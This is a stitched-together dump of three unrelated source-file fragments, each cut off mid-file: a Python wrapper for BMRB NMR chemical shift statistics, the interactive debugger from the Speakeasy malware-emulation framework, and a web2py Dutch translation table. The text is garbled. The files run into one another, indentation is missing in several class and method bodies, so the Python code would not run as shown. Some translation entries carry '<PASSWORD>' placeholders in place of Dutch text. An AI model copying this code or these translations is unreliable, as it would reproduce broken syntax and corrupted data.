# 25-Jun-2021 <NAME> - add getAtomLikeNameSet() (DAOTHER-6830)
# 13-Oct-2021 <NAME> - code revision according to PEP8 using Pylint (DAOTHER-7389, issue #5)
# 03-Dec-2021 <NAME> - optimize loading performance of other chemical shift statistics (DAOTHER-7514)
##
""" Wrapper class for retrieving BMRB chemical shift statistics.
@author: <NAME>
"""
import sys
import os
import os.path
import csv
import re
import copy
import pickle
import collections
from wwpdb.utils.config.ConfigInfo import getSiteId
from wwpdb.utils.config.ConfigInfoApp import ConfigInfoAppCommon
from wwpdb.utils.nmr.io.ChemCompIo import ChemCompReader
def load_stat_from_pickle(file_name):
    """ Load BMRB chemical shift statistics from a pickle file.

        @param file_name: path of the pickle file
        @return: unpickled statistics list, or an empty list when the
                 file does not exist
    """
    if not os.path.exists(file_name):
        return []
    with open(file_name, 'rb') as ifh:
        return pickle.load(ifh)
def write_stat_as_pickle(atm_list, file_name):
    """ Serialize BMRB chemical shift statistics to a pickle file.

        @param atm_list: statistics (list of per-atom dictionaries)
        @param file_name: destination path, overwritten if it exists
    """
    with open(file_name, 'wb') as ofh:
        pickle.dump(atm_list, ofh)
class BMRBChemShiftStat:
""" Wrapper class for retrieving BMRB chemical shift statistics.
"""
def __init__(self):
    """ Initialize empty statistics containers, the CCD reader, and the
        cached column indices used to parse chem_comp categories, then
        load the statistics (pickle first, CSV as fallback).
    """
    # lazy import of others (non-standard residues)
    self.lazy_others = True
    # directory
    self.stat_dir = os.path.dirname(__file__) + '/bmrb_cs_stat/'
    # statistics objects
    # *_filt: diamagnetic-filtered statistics, *_full: unfiltered
    self.aa_filt = []
    self.aa_full = []
    self.dna_filt = []
    self.dna_full = []
    self.rna_filt = []
    self.rna_full = []
    self.others = []
    self.extras = []
    # comp_id sets per polymer type; __not_comp_ids caches known misses
    self.__aa_comp_ids = set()
    self.__dna_comp_ids = set()
    self.__rna_comp_ids = set()
    self.__oth_comp_ids = set()
    self.__ext_comp_ids = set()
    self.__std_comp_ids = set()
    self.__all_comp_ids = set()
    self.__not_comp_ids = set()
    # completeness thresholds used when classifying statistics
    self.aa_threshold = 0.1
    self.na_threshold = 0.3
    self.max_count_th = 10
    # CCD accessing utility
    self.__verbose = False
    self.__lfh = sys.stderr
    self.__cICommon = ConfigInfoAppCommon(getSiteId())
    self.__ccCvsPath = self.__cICommon.get_site_cc_cvs_path()
    self.__ccR = ChemCompReader(self.__verbose, self.__lfh)
    self.__ccR.setCachePath(self.__ccCvsPath)
    # one-entry cache of the last chem_comp definition looked up
    self.__last_comp_id = None
    self.__last_comp_id_test = False
    self.__last_chem_comp_dict = None
    self.__last_chem_comp_atoms = None
    self.__last_chem_comp_bonds = None
    # taken from wwpdb.apps.ccmodule.io.ChemCompIo
    self.__chem_comp_atom_dict = [
        ('_chem_comp_atom.comp_id', '%s', 'str', ''),
        ('_chem_comp_atom.atom_id', '%s', 'str', ''),
        ('_chem_comp_atom.alt_atom_id', '%s', 'str', ''),
        ('_chem_comp_atom.type_symbol', '%s', 'str', ''),
        ('_chem_comp_atom.charge', '%s', 'str', ''),
        ('_chem_comp_atom.pdbx_align', '%s', 'str', ''),
        ('_chem_comp_atom.pdbx_aromatic_flag', '%s', 'str', ''),
        ('_chem_comp_atom.pdbx_leaving_atom_flag', '%s', 'str', ''),
        ('_chem_comp_atom.pdbx_stereo_config', '%s', 'str', ''),
        ('_chem_comp_atom.model_Cartn_x', '%s', 'str', ''),
        ('_chem_comp_atom.model_Cartn_y', '%s', 'str', ''),
        ('_chem_comp_atom.model_Cartn_z', '%s', 'str', ''),
        ('_chem_comp_atom.pdbx_model_Cartn_x_ideal', '%s', 'str', ''),
        ('_chem_comp_atom.pdbx_model_Cartn_y_ideal', '%s', 'str', ''),
        ('_chem_comp_atom.pdbx_model_Cartn_z_ideal', '%s', 'str', ''),
        ('_chem_comp_atom.pdbx_component_atom_id', '%s', 'str', ''),
        ('_chem_comp_atom.pdbx_component_comp_id', '%s', 'str', ''),
        ('_chem_comp_atom.pdbx_ordinal', '%s', 'str', ' ')
    ]
    # cache list indices of the frequently used chem_comp_atom columns
    atom_id = next(d for d in self.__chem_comp_atom_dict if d[0] == '_chem_comp_atom.atom_id')
    self.__cca_atom_id = self.__chem_comp_atom_dict.index(atom_id)
    aromatic_flag = next(d for d in self.__chem_comp_atom_dict if d[0] == '_chem_comp_atom.pdbx_aromatic_flag')
    self.__cca_aromatic_flag = self.__chem_comp_atom_dict.index(aromatic_flag)
    leaving_atom_flag = next(d for d in self.__chem_comp_atom_dict if d[0] == '_chem_comp_atom.pdbx_leaving_atom_flag')
    self.__cca_leaving_atom_flag = self.__chem_comp_atom_dict.index(leaving_atom_flag)
    type_symbol = next(d for d in self.__chem_comp_atom_dict if d[0] == '_chem_comp_atom.type_symbol')
    self.__cca_type_symbol = self.__chem_comp_atom_dict.index(type_symbol)
    # taken from wwpdb.apps.ccmodule.io.ChemCompIo
    self.__chem_comp_bond_dict = [
        ('_chem_comp_bond.comp_id', '%s', 'str', ''),
        ('_chem_comp_bond.atom_id_1', '%s', 'str', ''),
        ('_chem_comp_bond.atom_id_2', '%s', 'str', ''),
        ('_chem_comp_bond.value_order', '%s', 'str', ''),
        ('_chem_comp_bond.pdbx_aromatic_flag', '%s', 'str', ''),
        ('_chem_comp_bond.pdbx_stereo_config', '%s', 'str', ''),
        ('_chem_comp_bond.pdbx_ordinal', '%s', 'str', '')
    ]
    # cache list indices of the frequently used chem_comp_bond columns
    atom_id_1 = next(d for d in self.__chem_comp_bond_dict if d[0] == '_chem_comp_bond.atom_id_1')
    self.__ccb_atom_id_1 = self.__chem_comp_bond_dict.index(atom_id_1)
    atom_id_2 = next(d for d in self.__chem_comp_bond_dict if d[0] == '_chem_comp_bond.atom_id_2')
    self.__ccb_atom_id_2 = self.__chem_comp_bond_dict.index(atom_id_2)
    aromatic_flag = next(d for d in self.__chem_comp_bond_dict if d[0] == '_chem_comp_bond.pdbx_aromatic_flag')
    self.__ccb_aromatic_flag = self.__chem_comp_bond_dict.index(aromatic_flag)
    # prefer the pre-built pickle files; fall back to parsing the CSVs
    if not self.loadStatFromPickleFiles():
        self.loadStatFromCsvFiles()
def isOk(self):
""" Return whether all BMRB chemical shift statistics are available.
"""
return len(self.aa_filt) > 0 and len(self.aa_full) > 0 and len(self.dna_filt) > 0 and len(self.dna_full) > 0 and \
len(self.rna_filt) > 0 and len(self.rna_full) and (len(self.others) > 0 or self.lazy_others)
def hasCompId(self, comp_id):
    """ Return whether a given comp_id has BMRB chemical shift statistics.
        As a side effect, lazily loads the 'others' statistics for
        non-standard comp_ids.
    """
    if comp_id in self.__std_comp_ids:
        return True
    self.loadOtherStatFromCsvFiles(comp_id)
    return comp_id in self.__all_comp_ids
def getTypeOfCompId(self, comp_id):
    """ Return type of a given comp_id.
        @return: array of bool: peptide, nucleotide, carbohydrate
    """
    # fast path: known standard amino acids / nucleotides
    if comp_id in self.__aa_comp_ids:
        return True, False, False
    if comp_id in self.__dna_comp_ids or comp_id in self.__rna_comp_ids:
        return False, True, False
    # otherwise consult the CCD _chem_comp.type of the component
    if self.__updateChemCompDict(comp_id):
        ctype = self.__last_chem_comp_dict['_chem_comp.type']
        if 'PEPTIDE' in ctype:
            return True, False, False
        if 'DNA' in ctype or 'RNA' in ctype:
            return False, True, False
        if 'SACCHARIDE' in ctype:
            return False, False, True
    # last resort: vote by which polymer-type backbone atom set matches best;
    # ties (including all-zero) yield (False, False, False)
    peptide_like = len(self.getBackBoneAtoms(comp_id, True, True, False, False))
    nucleotide_like = len(self.getBackBoneAtoms(comp_id, True, False, True, False))
    carbohydrate_like = len(self.getBackBoneAtoms(comp_id, True, False, False, True))
    return peptide_like > nucleotide_like and peptide_like > carbohydrate_like,\
        nucleotide_like > peptide_like and nucleotide_like > carbohydrate_like,\
        carbohydrate_like > peptide_like and carbohydrate_like > nucleotide_like
def hasEnoughStat(self, comp_id, primary=True):
    """ Return whether a given comp_id has enough chemical shift statistics.
        @param primary: when True, require at least one atom flagged
                        'primary'; otherwise require a 'secondary' flag
    """
    # standard residues always have sufficient statistics
    if comp_id in self.__std_comp_ids:
        return True
    self.loadOtherStatFromCsvFiles(comp_id)
    if comp_id not in self.__all_comp_ids:
        return False
    if primary:
        if any(i for i in self.others if i['comp_id'] == comp_id and i['primary']):
            return True
    else:
        if any(i for i in self.others if i['comp_id'] == comp_id and 'secondary' in i and i['secondary']):
            return True
    return False
def get(self, comp_id, diamagnetic=True):
    """ Return BMRB chemical shift statistics for a given comp_id.
        @param diamagnetic: select the diamagnetic-filtered (*_filt)
                            statistics rather than the full (*_full) ones
        @return: list of per-atom statistics dictionaries ([] if unknown)
    """
    # public counterpart of __get(); unlike __get() it does NOT fall back
    # to CCD-derived 'extras' for completely unknown components
    if comp_id in self.__aa_comp_ids:
        if diamagnetic:
            return [i for i in self.aa_filt if i['comp_id'] == comp_id]
        return [i for i in self.aa_full if i['comp_id'] == comp_id]
    if comp_id in self.__dna_comp_ids:
        if diamagnetic:
            return [i for i in self.dna_filt if i['comp_id'] == comp_id]
        return [i for i in self.dna_full if i['comp_id'] == comp_id]
    if comp_id in self.__rna_comp_ids:
        if diamagnetic:
            return [i for i in self.rna_filt if i['comp_id'] == comp_id]
        return [i for i in self.rna_full if i['comp_id'] == comp_id]
    self.loadOtherStatFromCsvFiles(comp_id)
    if comp_id not in self.__all_comp_ids:
        return []
    return [i for i in self.others if i['comp_id'] == comp_id]
def __get(self, comp_id, diamagnetic=True):
    """ Return atom list for a given comp_id.
        Internal variant of get(): additionally falls back to CCD-derived
        'extras' entries (via __appendExtraFromCcd) when no BMRB
        statistics exist for the component.
    """
    if comp_id in self.__aa_comp_ids:
        if diamagnetic:
            return [i for i in self.aa_filt if i['comp_id'] == comp_id]
        return [i for i in self.aa_full if i['comp_id'] == comp_id]
    if comp_id in self.__dna_comp_ids:
        if diamagnetic:
            return [i for i in self.dna_filt if i['comp_id'] == comp_id]
        return [i for i in self.dna_full if i['comp_id'] == comp_id]
    if comp_id in self.__rna_comp_ids:
        if diamagnetic:
            return [i for i in self.rna_filt if i['comp_id'] == comp_id]
        return [i for i in self.rna_full if i['comp_id'] == comp_id]
    self.loadOtherStatFromCsvFiles(comp_id)
    if comp_id not in self.__all_comp_ids:
        self.__appendExtraFromCcd(comp_id)
    if comp_id in self.__oth_comp_ids:
        return [i for i in self.others if i['comp_id'] == comp_id]
    if comp_id in self.__ext_comp_ids:
        return [i for i in self.extras if i['comp_id'] == comp_id]
    return []
def getMaxAmbigCodeWoSetId(self, comp_id, atom_id):
""" Return maximum ambiguity code of a given atom that does not require declaration of ambiguity set ID.
@return: one of (1, 2, 3), 0 for not found
"""
if comp_id not in self.__std_comp_ids:
self.loadOtherStatFromCsvFiles(comp_id)
if comp_id not in self.__all_comp_ids:
self.__appendExtraFromCcd(comp_id)
try:
d = next(i['desc'] for i in self.__get(comp_id) if i['atom_id'] == atom_id)
if 'geminal' in d:
return 2
if d == 'aroma-opposite':
return 3
return 1
except StopIteration:
return 0
def getGeminalAtom(self, comp_id, atom_id):
    """ Return geminal or aromatic opposite atom of a given atom.
        @return: partner atom_id, or None when the atom has no partner
    """
    if comp_id not in self.__std_comp_ids:
        self.loadOtherStatFromCsvFiles(comp_id)
        if comp_id not in self.__all_comp_ids:
            self.__appendExtraFromCcd(comp_id)
    cs_stat = self.__get(comp_id)
    try:
        d = next(i['desc'] for i in cs_stat if i['atom_id'] == atom_id)
        # methyl protons: partner differs in the group digit but keeps the
        # trailing proton digit (e.g. HG11 <-> HG21)
        if d == 'methyl-geminal' and atom_id[0] == 'H':
            return next(i['atom_id'] for i in cs_stat
                        if i['desc'] == d and i['atom_id'] != atom_id and i['atom_id'][:-2] == atom_id[:-2] and i['atom_id'][-1] == atom_id[-1])
        if 'geminal' in d or d == 'aroma-opposite':
            # unprimed names pair on the last character (e.g. HB2 <-> HB3)
            if not atom_id.endswith("'"):
                return next(i['atom_id'] for i in cs_stat
                            if i['desc'] == d and i['atom_id'] != atom_id and i['atom_id'][:-1] == atom_id[:-1])
            # primed names pair by adding/removing one prime (H5' <-> H5'')
            if atom_id.endswith("''"):
                return next(i['atom_id'] for i in cs_stat
                            if i['desc'] == d and i['atom_id'] != atom_id and i['atom_id'] == atom_id[:-1])
            return next(i['atom_id'] for i in cs_stat
                        if i['desc'] == d and i['atom_id'] != atom_id and i['atom_id'] == atom_id + "'")
        return None
    except StopIteration:
        # atom unknown, or its expected partner is absent from the statistics
        return None
def getAllAtoms(self, comp_id, excl_minor_atom=False, primary=False):
    """ Return all atoms of a given comp_id.
        @param excl_minor_atom: drop atoms not flagged primary/secondary
        @param primary: treat non-standard comp_ids like standard ones
                        (filter on the 'primary' flag)
    """
    if comp_id not in self.__std_comp_ids:
        self.loadOtherStatFromCsvFiles(comp_id)
        if comp_id not in self.__all_comp_ids:
            self.__appendExtraFromCcd(comp_id)
    cs_stat = self.__get(comp_id)
    if comp_id in self.__std_comp_ids or primary:
        return [i['atom_id'] for i in cs_stat if
                (not excl_minor_atom or (excl_minor_atom and i['primary']))]
    # NOTE(review): when excl_minor_atom is True this keeps atoms that either
    # lack a 'secondary' key or have it set truthy; the inner
    # 'excl_minor_atom and' is redundant but harmless.
    return [i['atom_id'] for i in cs_stat if
            (not excl_minor_atom or 'secondary' not in i or (excl_minor_atom and i['secondary']))]
def | |
<reponame>dtrizna/speakeasy<gh_stars>100-1000
# Copyright (C) 2021 FireEye, Inc. All Rights Reserved.
import os
import sys
import cmd
import shlex
import fnmatch
import logging
import binascii
import argparse
import traceback
import hexdump
import speakeasy
import speakeasy.winenv.arch as e_arch
from speakeasy.errors import SpeakeasyError
if sys.platform != 'win32':
import readline # noqa (used by cmd)
class DebuggerException(Exception):
    """Raised for debugger-specific errors (e.g. invalid setup arguments)."""
    pass
def get_logger():
    """
    Return the shared 'sedbg' logger, attaching a stream handler and
    setting INFO level the first time it is requested.
    """
    log = logging.getLogger('sedbg')
    if log.handlers:
        # Already configured on a previous call; reuse as-is.
        return log
    handler = logging.StreamHandler()
    log.addHandler(handler)
    log.setLevel(logging.INFO)
    return log
class Breakpoint(object):
    """A single debugger breakpoint: an int address, or an API name (stored lowercased)."""

    _id = 0  # class-wide counter used to hand out unique breakpoint IDs

    def __init__(self, address):
        self.address = address if isinstance(address, int) else address.lower()
        self.id = Breakpoint._id
        Breakpoint._id += 1
class SpeakeasyDebugger(cmd.Cmd):
prompt = '(sedbg) '
file = None
    def __init__(self, target=None, is_sc=False, arch=None, data=None, logger=None, se_inst=None):
        """
        Interactive debugger shell wrapped around a Speakeasy emulator.

        target:  path of the module or shellcode to debug (optional)
        is_sc:   True when `target` is raw shellcode rather than a PE module
        arch:    architecture string; required when debugging shellcode
        data:    not used by this constructor
        logger:  logger used for all debugger output
        se_inst: pre-built Speakeasy instance to attach to instead of creating one
        """
        super(SpeakeasyDebugger, self).__init__()
        self.target = target
        self.is_sc = is_sc
        self.arch = arch
        self.logger = logger
        if not se_inst:
            self.se = speakeasy.Speakeasy(logger=self.logger)
        else:
            self.se = se_inst
        self.loaded_modules = []
        self.loaded_shellcode = []
        self.targets = []
        self.breakpoints = {}
        # Register the code/API hooks and reset stepping state.
        self.init_state()
        if self.is_sc and not self.arch:
            raise DebuggerException('Architecture required when debugging shellcode')
        if self.target:
            if not self.is_sc:
                # Load the initial target module
                self.load_module(self.target)
            else:
                self.load_shellcode(self.target, self.arch)
def init_state(self):
if self.se:
self.se.add_code_hook(self.code_hook)
self.se.add_api_hook(self.api_hook, '*', '*') # hook every API
self.step = False
self.running = False
self._do_stop = False
self.exit = False
self.step_over = 0
self.next_pc = 0
def error(self, msg):
self.logger.error('[-] ' + msg)
    def info(self, msg):
        """Forward *msg* verbatim to the debugger's logger at INFO level."""
        self.logger.info(msg)
def log_disasm(self, addr, size):
ds = self.se.disasm(addr, size, False)[0]
out = '0x%x: %s %s' % (ds.address, ds.mnemonic, ds.op_str)
self.info(out)
    def format_hexdump(self, data, address=0):
        """
        Render *data* as hexdump text, rebasing the leading offset column onto
        *address* (16 hex digits when the base exceeds 32 bits, 8 otherwise).
        """
        output = []
        for line in hexdump.hexdump(data, result='generator'):
            # Each generated line looks like '<hex offset>: <bytes  ascii>';
            # split it at the first colon.
            offset = line[: line.find(':')]
            rest = line[line.find(':'):]
            # The offset field is big-endian hex text -> absolute int offset.
            offset = int.from_bytes(binascii.unhexlify(offset), 'big')
            if address > 0xFFFFFFFF:
                fmt = r'%016X'
            else:
                fmt = r'%08X'
            addr = fmt % (offset + address)
            output.append(addr + rest)
        return '\n'.join(output)
def _break(self, addr):
'''
Return execution back to the debugger and do not execute the
current instruction.
'''
self.step = False
self._do_stop = True
self.next_pc = addr
self.se.stop()
    def api_hook(self, emu, api_name, func, params):
        '''
        Hook called for API calls
        '''
        # Run the real API handler first so its return value is passed through
        # regardless of whether a breakpoint fires.
        rv = func(params)
        addr = emu.get_ret_address()  # NOTE(review): computed but never used below
        # Exact match on the full lowercased API name (e.g. 'kernel32.createfilea').
        bp = self.breakpoints.get(api_name.lower())
        if bp:
            self.info('\nBreakpoint %d hit for %s' % (bp.id, api_name))
            # Arm single-step so code_hook pauses at the next instruction.
            self.step = True
            return rv
        elif '.' in api_name:
            # Also try the bare function name without the module prefix.
            fn = api_name.split('.')[1]
            bp = self.breakpoints.get(fn.lower())
            if bp:
                self.info('\nBreakpoint %d hit for %s' % (bp.id, api_name))
                self.step = True
                return rv
            # Finally, treat string breakpoint keys as fnmatch-style wildcard
            # patterns against the full API name (e.g. 'kernel32.create*').
            for addr, bp in self.breakpoints.items():
                # NOTE(review): this loop shadows the earlier `addr`; harmless
                # today since the return address is unused after this point.
                if not isinstance(addr, int):
                    if fnmatch.fnmatch(api_name.lower(), addr.lower()):
                        self.info('\nBreakpoint %d hit for %s' % (bp.id, api_name))
                        self.step = True
                        return rv
        return rv
    def code_hook(self, emu, addr, size, ctx):
        '''
        Hook called for each instruction while debugging
        '''
        # A _break() was requested on the previous instruction: record where
        # execution paused and consume the pending stop request.
        if self._do_stop:
            self.next_pc = addr
            self._do_stop = False
            return True
        # Address breakpoints: show the hit instruction, then pause.
        if self.breakpoints:
            bp = self.breakpoints.get(addr)
            if bp:
                self.log_disasm(addr, size)
                self.info('\nBreakpoint %d hit for 0x%x' % (bp.id, addr))
                self._break(addr)
                return True
        # Single-step mode: log the current instruction and pause again.
        if self.step:
            sres, eres = emu.get_reserved_ranges()
            if sres < addr < eres:
                # Inside the emulator's reserved range — presumably an API
                # trampoline; report the caller's return address instead.
                # TODO(review): confirm reserved-range semantics with speakeasy.
                addr = emu.get_ret_address()
            self.log_disasm(addr, size)
            self._break(addr)
        return True
    def stop(self):
        '''
        Stop running the emulator
        '''
        # Halt emulation first, then mark the debugger as idle.
        self.se.stop()
        self.running = False
def convert_bin_str(self, hstr):
'''
Convert a hex string to an int
'''
# Was a register supplied? Read it.
regs = self.se.get_all_registers()
val = regs.get(hstr.lower())
if val:
hstr = val
if hstr.startswith('0x'):
int_val = int(hstr, 16)
else:
int_val = int(hstr, 10)
return int_val
def dump_mem(self, address, length):
'''
Dump memory (until an invalid memory read or max length occurs)
'''
data = []
try:
for i in range(length):
data.append(self.se.mem_read(address + i, 1))
except SpeakeasyError:
self.error("Failed memory read at address: 0x%x" % (address + i))
return b''.join(data)
def write_mem(self, address, data):
'''
Write memory (until an invalid memory read or max length occurs)
'''
try:
for i, b in enumerate(bytes(data)):
self.se.mem_write(address + i, data[i: i + 1])
except Exception:
self.error("Failed memory write at address: 0x%x" % (address + i))
finally:
return
def do_maps(self, args):
'''
Get a list of all memory maps in the emulation space
Usage:
maps
'''
self.info('Base\t\t Size\t Tag')
for mm in self.se.get_mem_maps():
line = '0x%016x 0x%08x %s' % (mm.get_base(), mm.get_size(), mm.get_tag())
self.info(line)
def do_bl(self, args):
'''
List all current breakpoints and their IDs
Usage:
bl
'''
self.info('Breakpoints:')
for addr, bp in self.breakpoints.items():
if isinstance(addr, int):
line = '%d: 0x%016x' % (bp.id, addr)
else:
line = '%d: %s' % (bp.id, addr)
self.info(line)
def do_bp(self, args):
'''
Set a breakpoint at the specified address or API name
Usage:
bp [ <breakpoint_addr> | <api_name> ]
bp 0x10001020
'''
split_args = shlex.split(args)
address = split_args[0]
try:
address = self.convert_bin_str(address)
bp = Breakpoint(address)
msg = '[*] Breakpoint %d set at address 0x%x' % (bp.id, address)
rv = address
except Exception:
orig = address
address = address.lower()
bp = Breakpoint(address)
msg = '[*] Breakpoint %d set at %s' % (bp.id, orig)
rv = None
self.breakpoints.update({address: bp})
self.info(msg)
return rv
def do_bc(self, args):
'''
Remove a breakpoint by ID
Usage:
bc <breakpoint_id>
bc 1
'''
split_args = shlex.split(args)
try:
_id = int(split_args[0])
except Exception:
self.error('Invalid breakpoint id')
return None
for addr, bp in self.breakpoints.items():
if _id == bp.id:
self.info('[*] Removing breakpoint %d' % (_id))
self.breakpoints.pop(addr)
return addr
def do_disas(self, args):
'''
Disassemble an address
Usage:
disas <address> [length]
'''
split_args = shlex.split(args)
if not split_args:
self.error('Invalid arguments: disas <address> [size]')
return
address = ''
length = '0x10'
address = split_args[0]
try:
length = split_args[1]
except IndexError:
# Use the default length
pass
try:
addr = self.convert_bin_str(address)
length = self.convert_bin_str(length)
instrs = self.se.disasm(addr, length, False)
except ValueError:
self.error('Invalid arguments')
return
except SpeakeasyError:
self.error('Failed to disassemble at address: %s' % (address))
return
for i in instrs:
self.info('0x%x: %s %s' % (i.address, i.mnemonic, i.op_str))
def load_module(self, module):
'''
Load a module into the emulation space
'''
if not os.path.exists(module):
self.error('Can\'t find module: %s' % (module))
else:
module = self.se.load_module(module)
self.loaded_modules.append(module)
def load_shellcode(self, sc_path, arch):
'''
Load shellcode into the emulation space
'''
if self.is_sc:
arch = arch.lower()
if arch in ('x86', 'i386'):
arch = e_arch.ARCH_X86
elif arch in ('x64', 'amd64'):
arch = e_arch.ARCH_AMD64
else:
raise Exception('Unsupported architecture: %s' % arch)
if not os.path.exists(sc_path):
self.error('Can\'t find shellcode: %s' % (sc_path))
else:
sc = self.se.load_shellcode(sc_path, arch)
self.loaded_shellcode.append(sc)
return sc
    def do_restart(self, arg):
        '''
        Restart emulation from the entry point
        '''
        # Build a fresh emulator, reload the original target the same way
        # __init__ did, re-arm hooks/state, then start running again.
        self.se = speakeasy.Speakeasy(logger=self.logger)
        if self.target:
            if not self.is_sc:
                # Load the initial target module
                self.load_module(self.target)
            else:
                self.load_shellcode(self.target, self.arch)
        self.init_state()
        self.do_run(None)
    def do_load_module(self, arg):
        '''
        Wrapper to load a module
        '''
        # Thin cmd-command wrapper; *arg* is the path typed by the user.
        self.load_module(arg)
def do_eb(self, args):
'''
Edit bytes at the specified address
Usage:
eb <address> <byte_string>
Example:
eb 0x401000 9090909090c3
'''
split_args = shlex.split(args)
if len(split_args) < 2:
self.error('Invalid arguments: eb <address> <byte_string>')
return
address = split_args[0]
address = self.convert_bin_str(address)
data = ''.join(split_args[1:])
# Do some basic normalization
if data.startswith('0x'):
data = data[2:]
data = data.replace(' ', '')
if len(data) % 2:
data = '0' + data
data = binascii.unhexlify(data)
self.write_mem(address, data)
def do_db(self, args):
'''
Dump bytes from emulated memory
Usage:
db <address> [length]
Example:
db 0x401000
'''
split_args = shlex.split(args)
if len(split_args) < 1:
self.error('Invalid arguments: db <address> <size>')
return
address = split_args[0]
address = self.convert_bin_str(address)
decoy = self.se.emu.get_mod_from_addr(address)
if decoy:
self.se.emu.map_decoy(decoy)
if len(split_args) == 1:
address = split_args[0]
address = self.convert_bin_str(address)
data = self.dump_mem(address, 0x50)
elif len(split_args) == 2:
address, length = split_args
address = self.convert_bin_str(address)
length = self.convert_bin_str(length)
data = self.dump_mem(address, length)
output = self.format_hexdump(data, address=address)
self.info(output)
def do_lm(self, args):
'''
List user modules loaded into the emulation space
Usage:
lm
'''
ums = self.se.get_user_modules()
self.info('Start\t\t\tEnd\t\t\tName\t\tPath')
for um in ums:
base = '0x%016x' % um.get_base()
end = '0x%016x' % (um.get_base() + um.get_image_size())
name = um.get_base_name().ljust(16)
path = um.get_emu_path()
self.info('%s\t%s\t%s%s' % (base, end, name, path))
def do_lmk(self, args):
'''
List kernel modules loaded into the emulation space
Usage:
lmk
'''
kms = self.se.get_sys_modules()
self.info('Start\t\t\tEnd\t\t\tName\t\tPath')
for km in kms:
base = '0x%016x' % km.get_base()
end = '0x%016x' % (km.get_base() + km.get_image_size())
name = km.get_base_name().ljust(16)
path = km.get_emu_path()
self.info('%s\t%s\t%s%s' % (base, end, name, path))
def do_reg(self, arg):
'''
Read or write the contents of the emulated cpu registers
Usage:
reg
reg <reg_to_read>
reg <reg_to_write>=<value>
'''
# Is the user requesting all registers?
regs = self.se.get_all_registers()
if not | |
<filename>web_version/languages/nl.py
# -*- coding: utf-8 -*-
{
'!langcode!': 'nl',
'!langname!': 'Nederlands',
'"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN': '"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN',
'%(nrows)s records found': '%(nrows)s records gevonden',
'%d days ago': '%d dagen geleden',
'%d weeks ago': '%d weken gelden',
'%s %%{row} deleted': '%s rijen verwijderd',
'%s %%{row} updated': '%s rijen geupdate',
'%s selected': '%s geselecteerd',
'%Y-%m-%d': '%Y-%m-%d',
'%Y-%m-%d %H:%M:%S': '%Y-%m-%d %H:%M:%S',
'(something like "it-it")': '(zoiets als "nl-nl")',
'1 day ago': '1 dag geleden',
'1 week ago': '1 week gelden',
'<': '<',
'<=': '<=',
'=': '=',
'>': '>',
'>=': '>=',
'A new version of web2py is available': 'Een nieuwe versie van web2py is beschikbaar',
'A new version of web2py is available: %s': 'Een nieuwe versie van web2py is beschikbaar: %s',
'About': 'Over',
'about': 'over',
'About application': 'Over applicatie',
'Access Control': 'Toegangscontrole',
'Add': 'Toevoegen',
'additional code for your application': 'additionele code voor je applicatie',
'admin disabled because no admin password': 'admin is uitgezet omdat er geen admin wachtwoord is',
'admin disabled because not supported on google app engine': 'admin is uitgezet omdat dit niet ondersteund wordt op google app engine',
'admin disabled because unable to access password file': 'admin is uitgezet omdat het wachtwoordbestand niet geopend kan worden',
'Admin is disabled because insecure channel': 'Admin is uitgezet om het kanaal onveilig is',
'Admin is disabled because unsecure channel': 'Admin is uitgezet om het kanaal onveilig is',
'Administration': 'Administratie',
'Administrative Interface': 'Administratieve Interface',
'Administrator Password:': '<PASSWORD>',
'Ajax Recipes': 'Ajax Recepten',
'And': 'En',
'and rename it (required):': 'en hernoem deze (vereist)',
'and rename it:': 'en hernoem:',
'appadmin': 'appadmin',
'appadmin is disabled because insecure channel': 'appadmin is uitgezet vanwege een onveilig kanaal',
'application "%s" uninstalled': 'applicatie "%s" gedeïnstalleerd',
'application compiled': 'applicatie gecompileerd',
'application is compiled and cannot be designed': 'applicatie is gecompileerd en kan niet worden ontworpen',
'Are you sure you want to delete file "%s"?': 'Weet je zeker dat je bestand "%s" wilt verwijderen?',
'Are you sure you want to delete this object?': 'Weet je zeker dat je dit object wilt verwijderen?',
'Are you sure you want to uninstall application "%s"?': 'Weet je zeker dat je applicatie "%s" wilt deïnstalleren?',
'ATTENTION: Login requires a secure (HTTPS) connection or running on localhost.': 'LET OP: Login vereist een beveiligde (HTTPS) connectie of moet draaien op localhost.',
'ATTENTION: TESTING IS NOT THREAD SAFE SO DO NOT PERFORM MULTIPLE TESTS CONCURRENTLY.': 'LET OP: TESTEN IS NIET THREAD SAFE, PROBEER NIET GELIJKTIJDIG MEERDERE TESTS TE DOEN.',
'ATTENTION: you cannot edit the running application!': 'LET OP: je kan de applicatie die nu draait niet editen!',
'Authentication': 'Authenticatie',
'Available Databases and Tables': 'Beschikbare databases en tabellen',
'Back': 'Terug',
'Buy this book': 'Koop dit boek',
'Cache': 'Cache',
'cache': 'cache',
'Cache Keys': 'Cache Keys',
'cache, errors and sessions cleaned': 'cache, errors en sessies geleegd',
'Cannot be empty': 'Mag niet leeg zijn',
'Cannot compile: there are errors in your app. Debug it, correct errors and try again.': 'Kan niet compileren: er bevinden zich fouten in je app. Debug, corrigeer de fouten en probeer opnieuw.',
'cannot create file': 'kan bestand niet maken',
'cannot upload file "%(filename)s"': 'kan bestand "%(filename)s" niet uploaden',
'Change Password': '<PASSWORD>',
'Change password': '<PASSWORD>',
'change password': '<PASSWORD>',
'check all': 'vink alles aan',
'Check to delete': 'Vink aan om te verwijderen',
'clean': 'leeg',
'Clear': 'Leeg',
'Clear CACHE?': 'Leeg CACHE?',
'Clear DISK': 'Leeg DISK',
'Clear RAM': 'Clear RAM',
'click to check for upgrades': 'Klik om voor upgrades te controleren',
'Client IP': 'Client IP',
'Community': 'Community',
'compile': 'compileren',
'compiled application removed': 'gecompileerde applicatie verwijderd',
'Components and Plugins': 'Components en Plugins',
'contains': 'bevat',
'Controller': 'Controller',
'Controllers': 'Controllers',
'controllers': 'controllers',
'Copyright': 'Copyright',
'create file with filename:': 'maak bestand met de naam:',
'Create new application': 'Maak nieuwe applicatie:',
'create new application:': 'maak nieuwe applicatie',
'Created By': 'Gemaakt Door',
'Created On': 'Gemaakt Op',
'crontab': 'crontab',
'Current request': 'Huidige request',
'Current response': 'Huidige response',
'Current session': 'Huidige sessie',
'currently saved or': 'op het moment opgeslagen of',
'customize me!': 'pas me aan!',
'data uploaded': 'data geupload',
'Database': 'Database',
'Database %s select': 'Database %s select',
'database administration': 'database administratie',
'Date and Time': 'Datum en Tijd',
'db': 'db',
'DB Model': 'DB Model',
'defines tables': 'definieer tabellen',
'Delete': 'Verwijder',
'delete': 'verwijder',
'delete all checked': 'verwijder alle aangevinkten',
